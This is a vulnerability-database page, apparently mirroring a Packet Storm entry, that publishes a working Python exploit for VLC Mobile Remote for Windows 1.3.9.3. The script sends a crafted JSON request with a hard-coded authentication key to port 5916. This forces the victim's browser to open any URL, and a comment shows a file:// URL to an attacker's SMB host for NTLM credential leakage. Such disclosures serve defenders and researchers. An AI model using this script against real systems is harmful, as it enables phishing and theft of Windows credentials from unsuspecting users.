Lucene search
K

📄 VLC Mobile Remote for Windows 1.3.9.3 Remote Arbitrary URL Launch

🗓️ 24 Jun 2025 00:00:00Reported by Chokri HammediType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 92 Views

Unauthenticated remote URL launch in VLC Mobile Remote 1.3.9.3 enables phishing and NTLM exposure.

Code
# Exploit Title: VLC Mobile Remote (VMR) for Windows v1.3.9.3  Remote
    Arbitrary URL Launch
    # Date: 06/24/2025
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://vlcmobileremote.com
    # Software Link: https://vlcmobileremote.com/Releases/Setup.exe
    # Version: 1.3.9.3
    # Tested on: Windows 10 (Build 19044)
    
    '''
    Description:
    
    VLC Mobile Remote for Windows 1.3.9.3 allows an unauthenticated attacker to
    remotely cause the target system to open any URL in the victim’s default
    web browser by sending a specially crafted request. This can lead to forced
    browsing to malicious sites, phishing attacks, or NTLM credential exposure
    via SMB or file URLs.
    
    '''
    
    import socket, time, json
    
    HOST = "192.168.8.105"
    PORT = 5916
    AUTH_KEY = "I2t3H*9s65J7F!E03K9M"
    URL = "https://google.com" # NTLM  credential leakage with  file://///
    192.168.8.100/any
    
    pkt = {
        "appAuthenticationKey": AUTH_KEY,
        "password": "",
        "sentTime": str(int(time.time() * 1000)),
        "request": f"/requests/system/command?key=launch_url&value={URL}"
    }
    
    with socket.socket() as s:
        s.connect((HOST, PORT))
        s.sendall((json.dumps(pkt) + "\x0a").encode())
        print(f"[>] Launching URL: {URL}")
    
    print("[✓] Done.")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation